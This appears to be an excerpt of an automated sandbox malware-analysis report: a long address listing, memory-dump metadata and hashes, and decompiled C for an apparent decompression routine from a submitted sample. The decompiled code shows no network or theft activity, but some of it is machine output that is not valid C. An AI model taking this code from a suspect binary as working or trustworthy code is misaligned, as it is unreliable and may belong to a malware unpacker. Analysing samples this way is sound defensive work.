                                                                                            0x0040637c
                                                                                            0x0040637f
                                                                                            0x00406382
                                                                                            0x0040638c
                                                                                            0x0040635b
                                                                                            0x0040635b
                                                                                            0x0040635e
                                                                                            0x00406361
                                                                                            0x00406364
                                                                                            0x00406371
                                                                                            0x00406374
                                                                                            0x00406374
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406398
                                                                                            0x0040639c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063a2
                                                                                            0x004063a6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063ac
                                                                                            0x004063ae
                                                                                            0x004063b2
                                                                                            0x004063b2
                                                                                            0x004063b5
                                                                                            0x004063b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406409
                                                                                            0x0040640d
                                                                                            0x00406414
                                                                                            0x00406417
                                                                                            0x0040641a
                                                                                            0x00406424
                                                                                            0x00000000
                                                                                            0x00406424
                                                                                            0x0040640f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406430
                                                                                            0x00406434
                                                                                            0x0040643b
                                                                                            0x0040643e
                                                                                            0x00406441
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406444
                                                                                            0x00406447
                                                                                            0x0040644a
                                                                                            0x0040644a
                                                                                            0x0040644d
                                                                                            0x00406450
                                                                                            0x00406453
                                                                                            0x00406453
                                                                                            0x00406456
                                                                                            0x0040645d
                                                                                            0x00406462
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064f0
                                                                                            0x004064f0
                                                                                            0x004064f4
                                                                                            0x00406892
                                                                                            0x00000000
                                                                                            0x00406892
                                                                                            0x004064fa
                                                                                            0x004064fd
                                                                                            0x00406500
                                                                                            0x00406504
                                                                                            0x00406507
                                                                                            0x0040650d
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x00406512
                                                                                            0x00406515
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004060e5
                                                                                            0x004060e5
                                                                                            0x004060e9
                                                                                            0x00406856
                                                                                            0x00000000
                                                                                            0x00406856
                                                                                            0x004060ef
                                                                                            0x004060f2
                                                                                            0x004060f5
                                                                                            0x004060f9
                                                                                            0x004060fc
                                                                                            0x00406102
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406107
                                                                                            0x0040610a
                                                                                            0x0040610a
                                                                                            0x0040610d
                                                                                            0x00406110
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406116
                                                                                            0x0040611c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406122
                                                                                            0x00406122
                                                                                            0x00406126
                                                                                            0x00406129
                                                                                            0x0040612c
                                                                                            0x0040612f
                                                                                            0x00406132
                                                                                            0x00406133
                                                                                            0x00406136
                                                                                            0x00406138
                                                                                            0x0040613e
                                                                                            0x00406141
                                                                                            0x00406144
                                                                                            0x00406147
                                                                                            0x0040614a
                                                                                            0x0040614d
                                                                                            0x00406150
                                                                                            0x0040616c
                                                                                            0x0040616f
                                                                                            0x00406172
                                                                                            0x00406175
                                                                                            0x0040617c
                                                                                            0x00406180
                                                                                            0x00406182
                                                                                            0x00406186
                                                                                            0x00406152
                                                                                            0x00406152
                                                                                            0x00406156
                                                                                            0x0040615e
                                                                                            0x00406163
                                                                                            0x00406165
                                                                                            0x00406167
                                                                                            0x00406167
                                                                                            0x00406189
                                                                                            0x00406190
                                                                                            0x00406193
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x0040619e
                                                                                            0x0040619e
                                                                                            0x004061a2
                                                                                            0x00406862
                                                                                            0x00000000
                                                                                            0x00406862
                                                                                            0x004061a8
                                                                                            0x004061ab
                                                                                            0x004061ae
                                                                                            0x004061b2
                                                                                            0x004061b5
                                                                                            0x004061bb
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061c0
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004061cb
                                                                                            0x004061ce
                                                                                            0x004061d1
                                                                                            0x004061d4
                                                                                            0x004061d7
                                                                                            0x004061da
                                                                                            0x004061dd
                                                                                            0x004061e0
                                                                                            0x004061e3
                                                                                            0x004061e6
                                                                                            0x004061e9
                                                                                            0x00406201
                                                                                            0x00406204
                                                                                            0x00406207
                                                                                            0x0040620a
                                                                                            0x0040620a
                                                                                            0x0040620d
                                                                                            0x00406211
                                                                                            0x00406213
                                                                                            0x004061eb
                                                                                            0x004061eb
                                                                                            0x004061f3
                                                                                            0x004061f8
                                                                                            0x004061fa
                                                                                            0x004061fc
                                                                                            0x004061fc
                                                                                            0x00406216
                                                                                            0x0040621d
                                                                                            0x00406220
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00406220
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406262
                                                                                            0x00406262
                                                                                            0x00406266
                                                                                            0x0040686e
                                                                                            0x00000000
                                                                                            0x0040686e
                                                                                            0x0040626c
                                                                                            0x0040626f
                                                                                            0x00406272
                                                                                            0x00406276
                                                                                            0x00406279
                                                                                            0x0040627f
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406284
                                                                                            0x00406287
                                                                                            0x00406287
                                                                                            0x0040628d
                                                                                            0x0040622b
                                                                                            0x0040622b
                                                                                            0x0040622e
                                                                                            0x00000000
                                                                                            0x0040622e
                                                                                            0x0040628f
                                                                                            0x0040628f
                                                                                            0x00406292
                                                                                            0x00406295
                                                                                            0x00406298
                                                                                            0x0040629b
                                                                                            0x0040629e
                                                                                            0x004062a1
                                                                                            0x004062a4
                                                                                            0x004062a7
                                                                                            0x004062aa
                                                                                            0x004062ad
                                                                                            0x004062c5
                                                                                            0x004062c8
                                                                                            0x004062cb
                                                                                            0x004062ce
                                                                                            0x004062ce
                                                                                            0x004062d1
                                                                                            0x004062d5
                                                                                            0x004062d7
                                                                                            0x004062af
                                                                                            0x004062af
                                                                                            0x004062b7
                                                                                            0x004062bc
                                                                                            0x004062be
                                                                                            0x004062c0
                                                                                            0x004062c0
                                                                                            0x004062da
                                                                                            0x004062e1
                                                                                            0x004062e4
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x00406573
                                                                                            0x00406573
                                                                                            0x00406577
                                                                                            0x0040689e
                                                                                            0x00000000
                                                                                            0x0040689e
                                                                                            0x0040657d
                                                                                            0x00406580
                                                                                            0x00406583
                                                                                            0x00406587
                                                                                            0x0040658a
                                                                                            0x00406590
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406595
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406343
                                                                                            0x00406343
                                                                                            0x00406346
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406682
                                                                                            0x00406686
                                                                                            0x004066a8
                                                                                            0x004066ab
                                                                                            0x004066b5
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x00406688
                                                                                            0x0040668b
                                                                                            0x0040668f
                                                                                            0x00406692
                                                                                            0x00406692
                                                                                            0x00406695
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040673f
                                                                                            0x00406743
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406768
                                                                                            0x0040676f
                                                                                            0x00406776
                                                                                            0x00406776
                                                                                            0x00000000
                                                                                            0x00406776
                                                                                            0x00406745
                                                                                            0x00406748
                                                                                            0x0040674b
                                                                                            0x0040674e
                                                                                            0x00406755
                                                                                            0x00406699
                                                                                            0x00406699
                                                                                            0x0040669c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406830
                                                                                            0x00406833
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040646a
                                                                                            0x0040646c
                                                                                            0x00406473
                                                                                            0x00406474
                                                                                            0x00406476
                                                                                            0x00406479
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406481
                                                                                            0x00406484
                                                                                            0x00406487
                                                                                            0x00406489
                                                                                            0x0040648b
                                                                                            0x0040648b
                                                                                            0x0040648c
                                                                                            0x0040648f
                                                                                            0x00406496
                                                                                            0x00406499
                                                                                            0x004064a7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040677d
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040678c
                                                                                            0x0040678c
                                                                                            0x00406790
                                                                                            0x004068c8
                                                                                            0x00000000
                                                                                            0x004068c8
                                                                                            0x00406796
                                                                                            0x00406799
                                                                                            0x0040679c
                                                                                            0x004067a0
                                                                                            0x004067a3
                                                                                            0x004067a9
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ae
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b4
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x00406818
                                                                                            0x0040681b
                                                                                            0x00406820
                                                                                            0x00406821
                                                                                            0x00406823
                                                                                            0x00406825
                                                                                            0x00406828
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x00406734
                                                                                            0x004067ba
                                                                                            0x004067c0
                                                                                            0x004067c3
                                                                                            0x004067c6
                                                                                            0x004067c9
                                                                                            0x004067cc
                                                                                            0x004067cf
                                                                                            0x004067d2
                                                                                            0x004067d5
                                                                                            0x004067d8
                                                                                            0x004067db
                                                                                            0x004067f4
                                                                                            0x004067f7
                                                                                            0x004067fa
                                                                                            0x004067fd
                                                                                            0x00406801
                                                                                            0x00406803
                                                                                            0x00406803
                                                                                            0x00406804
                                                                                            0x00406807
                                                                                            0x004067dd
                                                                                            0x004067dd
                                                                                            0x004067e5
                                                                                            0x004067ea
                                                                                            0x004067ec
                                                                                            0x004067ef
                                                                                            0x004067ef
                                                                                            0x0040680a
                                                                                            0x00406811
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x004064af
                                                                                            0x004064b2
                                                                                            0x004064e8
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x0040661b
                                                                                            0x0040661b
                                                                                            0x0040661e
                                                                                            0x00406620
                                                                                            0x004068aa
                                                                                            0x00000000
                                                                                            0x004068aa
                                                                                            0x00406626
                                                                                            0x00406629
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040662f
                                                                                            0x00406633
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00000000
                                                                                            0x00406636
                                                                                            0x004064b4
                                                                                            0x004064b6
                                                                                            0x004064b8
                                                                                            0x004064ba
                                                                                            0x004064bd
                                                                                            0x004064be
                                                                                            0x004064c0
                                                                                            0x004064c2
                                                                                            0x004064c5
                                                                                            0x004064c8
                                                                                            0x004064de
                                                                                            0x004064e3
                                                                                            0x0040651b
                                                                                            0x0040651b
                                                                                            0x0040651f
                                                                                            0x0040654b
                                                                                            0x0040654d
                                                                                            0x00406554
                                                                                            0x00406557
                                                                                            0x0040655a
                                                                                            0x0040655a
                                                                                            0x0040655f
                                                                                            0x0040655f
                                                                                            0x00406561
                                                                                            0x00406564
                                                                                            0x0040656b
                                                                                            0x0040656e
                                                                                            0x0040659b
                                                                                            0x0040659b
                                                                                            0x0040659e
                                                                                            0x004065a1
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00000000
                                                                                            0x00406615
                                                                                            0x004065a3
                                                                                            0x004065a9
                                                                                            0x004065ac
                                                                                            0x004065af
                                                                                            0x004065b2
                                                                                            0x004065b5
                                                                                            0x004065b8
                                                                                            0x004065bb
                                                                                            0x004065be
                                                                                            0x004065c1
                                                                                            0x004065c4
                                                                                            0x004065dd
                                                                                            0x004065df
                                                                                            0x004065e2
                                                                                            0x004065e3
                                                                                            0x004065e6
                                                                                            0x004065e8
                                                                                            0x004065eb
                                                                                            0x004065ed
                                                                                            0x004065ef
                                                                                            0x004065f2
                                                                                            0x004065f4
                                                                                            0x004065f7
                                                                                            0x004065fb
                                                                                            0x004065fd
                                                                                            0x004065fd
                                                                                            0x004065fe
                                                                                            0x00406601
                                                                                            0x00406604
                                                                                            0x004065c6
                                                                                            0x004065c6
                                                                                            0x004065ce
                                                                                            0x004065d3
                                                                                            0x004065d5
                                                                                            0x004065d8
                                                                                            0x004065d8
                                                                                            0x00406607
                                                                                            0x0040660e
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x0040660e
                                                                                            0x00406521
                                                                                            0x00406524
                                                                                            0x00406526
                                                                                            0x00406529
                                                                                            0x0040652c
                                                                                            0x0040652f
                                                                                            0x00406531
                                                                                            0x00406534
                                                                                            0x00406537
                                                                                            0x00406537
                                                                                            0x0040653a
                                                                                            0x0040653a
                                                                                            0x0040653d
                                                                                            0x00406544
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00406544
                                                                                            0x004064ca
                                                                                            0x004064cd
                                                                                            0x004064cf
                                                                                            0x004064d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406231
                                                                                            0x00406231
                                                                                            0x00406235
                                                                                            0x0040687a
                                                                                            0x00000000
                                                                                            0x0040687a
                                                                                            0x0040623b
                                                                                            0x0040623e
                                                                                            0x00406241
                                                                                            0x00406244
                                                                                            0x00406247
                                                                                            0x0040624a
                                                                                            0x0040624d
                                                                                            0x0040624f
                                                                                            0x00406252
                                                                                            0x00406255
                                                                                            0x00406258
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063bc
                                                                                            0x004063bc
                                                                                            0x004063c0
                                                                                            0x00406886
                                                                                            0x00000000
                                                                                            0x00406886
                                                                                            0x004063c6
                                                                                            0x004063c9
                                                                                            0x004063cc
                                                                                            0x004063cf
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d4
                                                                                            0x004063d7
                                                                                            0x004063da
                                                                                            0x004063dd
                                                                                            0x004063e0
                                                                                            0x004063e3
                                                                                            0x004063e4
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e9
                                                                                            0x004063ec
                                                                                            0x004063ef
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f5
                                                                                            0x004063f7
                                                                                            0x004063f7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x0040663d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406643
                                                                                            0x00406646
                                                                                            0x00406649
                                                                                            0x0040664c
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x00406651
                                                                                            0x00406654
                                                                                            0x00406657
                                                                                            0x0040665a
                                                                                            0x0040665d
                                                                                            0x00406660
                                                                                            0x00406661
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406666
                                                                                            0x00406669
                                                                                            0x0040666c
                                                                                            0x0040666f
                                                                                            0x00406672
                                                                                            0x00406676
                                                                                            0x00406678
                                                                                            0x0040667b
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x004063fa
                                                                                            0x004063fa
                                                                                            0x00000000
                                                                                            0x004063fa
                                                                                            0x0040667b
                                                                                            0x004068b0
                                                                                            0x004068d2
                                                                                            0x004068d8
                                                                                            0x004068da
                                                                                            0x004068e1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x004068e7
                                                                                            0x004068e7
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                                                                                            • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                                                                                            • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                                                                                            • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 98%
                                                                                            			E004062EB() {
                                                                                            				signed int _t539;
                                                                                            				unsigned short _t540;
                                                                                            				signed int _t541;
                                                                                            				void _t542;
                                                                                            				signed int _t543;
                                                                                            				signed int _t544;
                                                                                            				signed int _t573;
                                                                                            				signed int _t576;
                                                                                            				signed int _t597;
                                                                                            				signed int* _t614;
                                                                                            				void* _t621;
                                                                                            
                                                                                            				L0:
                                                                                            				while(1) {
                                                                                            					L0:
                                                                                            					if( *(_t621 - 0x40) != 1) {
                                                                                            						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                            						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                            						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                            						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                            						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                            						_t539 =  *(_t621 - 4) + 0x664;
                                                                                            						 *(_t621 - 0x58) = _t539;
                                                                                            						goto L68;
                                                                                            					} else {
                                                                                            						 *(__ebp - 0x84) = 8;
                                                                                            						while(1) {
                                                                                            							L132:
                                                                                            							 *(_t621 - 0x54) = _t614;
                                                                                            							while(1) {
                                                                                            								L133:
                                                                                            								_t540 =  *_t614;
                                                                                            								_t597 = _t540 & 0x0000ffff;
                                                                                            								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                            								if( *(_t621 - 0xc) >= _t573) {
                                                                                            									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                            									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                            									 *(_t621 - 0x40) = 1;
                                                                                            									_t541 = _t540 - (_t540 >> 5);
                                                                                            									 *_t614 = _t541;
                                                                                            								} else {
                                                                                            									 *(_t621 - 0x10) = _t573;
                                                                                            									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                            									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                            								}
                                                                                            								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                            									goto L139;
                                                                                            								}
                                                                                            								L137:
                                                                                            								if( *(_t621 - 0x6c) == 0) {
                                                                                            									 *(_t621 - 0x88) = 5;
                                                                                            									L170:
                                                                                            									_t576 = 0x22;
                                                                                            									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                            									_t544 = 0;
                                                                                            									L172:
                                                                                            									return _t544;
                                                                                            								}
                                                                                            								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                            								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                            								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                            								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                            								L139:
                                                                                            								_t542 =  *(_t621 - 0x84);
                                                                                            								while(1) {
                                                                                            									 *(_t621 - 0x88) = _t542;
                                                                                            									while(1) {
                                                                                            										L1:
                                                                                            										_t543 =  *(_t621 - 0x88);
                                                                                            										if(_t543 > 0x1c) {
                                                                                            											break;
                                                                                            										}
                                                                                            										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                                                                                            											case 0:
                                                                                            												if( *(_t621 - 0x6c) == 0) {
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                            												_t543 =  *( *(_t621 - 0x70));
                                                                                            												if(_t543 > 0xe1) {
                                                                                            													goto L171;
                                                                                            												}
                                                                                            												_t547 = _t543 & 0x000000ff;
                                                                                            												_push(0x2d);
                                                                                            												asm("cdq");
                                                                                            												_pop(_t578);
                                                                                            												_push(9);
                                                                                            												_pop(_t579);
                                                                                            												_t617 = _t547 / _t578;
                                                                                            												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                            												asm("cdq");
                                                                                            												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                            												 *(_t621 - 0x3c) = _t612;
                                                                                            												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                            												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                            												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                            												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                            													L10:
                                                                                            													if(_t620 == 0) {
                                                                                            														L12:
                                                                                            														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                            														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                            														goto L15;
                                                                                            													} else {
                                                                                            														goto L11;
                                                                                            													}
                                                                                            													do {
                                                                                            														L11:
                                                                                            														_t620 = _t620 - 1;
                                                                                            														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                            													} while (_t620 != 0);
                                                                                            													goto L12;
                                                                                            												}
                                                                                            												if( *(_t621 - 4) != 0) {
                                                                                            													GlobalFree( *(_t621 - 4));
                                                                                            												}
                                                                                            												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                            												 *(_t621 - 4) = _t543;
                                                                                            												if(_t543 == 0) {
                                                                                            													goto L171;
                                                                                            												} else {
                                                                                            													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                            													goto L10;
                                                                                            												}
                                                                                            											case 1:
                                                                                            												L13:
                                                                                            												__eflags =  *(_t621 - 0x6c);
                                                                                            												if( *(_t621 - 0x6c) == 0) {
                                                                                            													 *(_t621 - 0x88) = 1;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                            												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                            												_t45 = _t621 - 0x48;
                                                                                            												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                            												__eflags =  *_t45;
                                                                                            												L15:
                                                                                            												if( *(_t621 - 0x48) < 4) {
                                                                                            													goto L13;
                                                                                            												}
                                                                                            												_t555 =  *(_t621 - 0x40);
                                                                                            												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                            													L20:
                                                                                            													 *(_t621 - 0x48) = 5;
                                                                                            													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                            													goto L23;
                                                                                            												}
                                                                                            												 *(_t621 - 0x74) = _t555;
                                                                                            												if( *(_t621 - 8) != 0) {
                                                                                            													GlobalFree( *(_t621 - 8));
                                                                                            												}
                                                                                            												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                            												 *(_t621 - 8) = _t543;
                                                                                            												if(_t543 == 0) {
                                                                                            													goto L171;
                                                                                            												} else {
                                                                                            													goto L20;
                                                                                            												}
                                                                                            											case 2:
                                                                                            												L24:
                                                                                            												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                            												 *(_t621 - 0x84) = 6;
                                                                                            												 *(_t621 - 0x4c) = _t562;
                                                                                            												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                            												goto L132;
                                                                                            											case 3:
                                                                                            												L21:
                                                                                            												__eflags =  *(_t621 - 0x6c);
                                                                                            												if( *(_t621 - 0x6c) == 0) {
                                                                                            													 *(_t621 - 0x88) = 3;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                            												_t67 = _t621 - 0x70;
                                                                                            												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                            												__eflags =  *_t67;
                                                                                            												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                            												L23:
                                                                                            												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                            												if( *(_t621 - 0x48) != 0) {
                                                                                            													goto L21;
                                                                                            												}
                                                                                            												goto L24;
                                                                                            											case 4:
                                                                                            												L133:
                                                                                            												_t540 =  *_t614;
                                                                                            												_t597 = _t540 & 0x0000ffff;
                                                                                            												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                            												if( *(_t621 - 0xc) >= _t573) {
                                                                                            													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                            													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                            													 *(_t621 - 0x40) = 1;
                                                                                            													_t541 = _t540 - (_t540 >> 5);
                                                                                            													 *_t614 = _t541;
                                                                                            												} else {
                                                                                            													 *(_t621 - 0x10) = _t573;
                                                                                            													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                            													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                            												}
                                                                                            												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                            													goto L139;
                                                                                            												}
                                                                                            											case 5:
                                                                                            												goto L137;
                                                                                            											case 6:
                                                                                            												__edx = 0;
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													__eax =  *(__ebp - 4);
                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                            													 *(__ebp - 0x34) = 1;
                                                                                            													 *(__ebp - 0x84) = 7;
                                                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                            													L132:
                                                                                            													 *(_t621 - 0x54) = _t614;
                                                                                            													goto L133;
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                            												__esi =  *(__ebp - 0x60);
                                                                                            												__cl = 8;
                                                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                            												__ecx =  *(__ebp - 0x3c);
                                                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                            												__ecx =  *(__ebp - 4);
                                                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                            												__eflags =  *(__ebp - 0x38) - 4;
